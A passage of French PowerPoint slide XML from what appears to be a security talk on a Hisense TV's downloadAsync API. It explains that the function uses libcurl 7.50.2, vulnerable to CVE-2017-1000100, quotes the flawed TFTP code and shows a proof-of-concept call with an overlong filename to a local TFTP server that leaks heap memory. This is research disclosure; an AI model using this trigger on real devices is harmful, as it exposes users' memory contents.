          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>downloadAsync</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74D7D70-4569-F500-FF09-C7FAC38CC720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366119" y="1468654"/>
            <a:ext cx="6597698" cy="3137366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9D211A-B7ED-20A9-CDBD-3073F3F97806}"/>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1" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33B06114-3260-5399-B09C-1FC6A0324992}"/>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Surface d’attaque logicielle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160216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88AA206-6B5A-542F-9AB4-5E006559C770}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97FF1F96-E863-D75A-2B31-5CCAF8F90A92}"/>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6CB9C546-DF99-7E69-B2B6-B073479D54B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CVE-2017-1000100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{389D060F-38CC-07B3-9DBC-3FDE8B0D85B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385582" y="1202363"/>
            <a:ext cx="8648700" cy="1338828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Après reverse il s’avère que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>downloadAsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> s’appuie sur la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>libcurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 7.50.2 vulnérable à la CVE-2017-1000100.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>When doing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>TFTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> transfer and curl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>libcurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> is given a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>URL that contains a very long file name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (longer than about 515 bytes), the file name is truncated to fit within the buffer boundaries, but the buffer size is still wrongly updated to use the untruncated length. This too large value is then used in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sendto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>() call, making curl attempt to send more data than what is actually put into the buffer. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sendto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>() function will then read beyond the end of the heap based buffer.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE9A40C1-BD14-6D61-4554-D6BAF4D48339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385582" y="2950544"/>
            <a:ext cx="2699792" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tftp.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FCF6A32-170B-DD53-F778-166E6EF27E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385582" y="3332972"/>
            <a:ext cx="7272518" cy="1061829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</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state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>spacket</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data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blksize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808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s%c%s%c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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filename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80808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mode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'\0’); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sbytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 4 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(mode); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>senddata</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sendto</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state</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sockfd</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err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</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state</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spacket</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data</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SEND_TYPE_ARG3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sbytes</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state</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conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</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ip_addr</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ai_addr</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state</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conn</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ip_addr</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ai_addrlen</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endParaRPr lang="fr-FR" sz="1050" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34640654-A4CC-D3C6-6852-08F00983314C}"/>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3" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495E07B7-BD83-4CE6-67F5-F577B6422F25}"/>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309655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D85AE45-0FAA-17B0-0028-CBE93603B32D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE681B93-F271-4C4F-0425-EDA5DB0AB859}"/>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00E58875-CA92-5F85-E945-2E0DC3270BA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CVE-2017-1000100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15C35A00-457D-6D27-9800-C8DB08E1297D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312419" y="1276588"/>
            <a:ext cx="8562365" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hisense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file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downloadAsync</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://192.168.1.48:6969/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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"A"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">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4096</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"toto"</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1</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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD345FFB-8C94-FB5F-95F5-B5D73AC2AB64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2280721" y="1616928"/>
            <a:ext cx="4893010" cy="3205904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267E5B27-3A09-18F3-96CE-C29413D50AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2442940" y="3869556"/>
            <a:ext cx="2007140" cy="756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6F3E9918-5813-06BB-B430-37F0FF122146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593601" y="4082070"/>
            <a:ext cx="1111481" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>HEAP LEAK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50ADE39C-A76F-F169-6E8C-0134F7DA06FE}"/>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6" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1371684-9B26-7F8B-15B0-43E3CB109B66}"/>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23649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programme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" strike="sngStrike" dirty="0"/>
              <a:t>télé</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du contenu 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
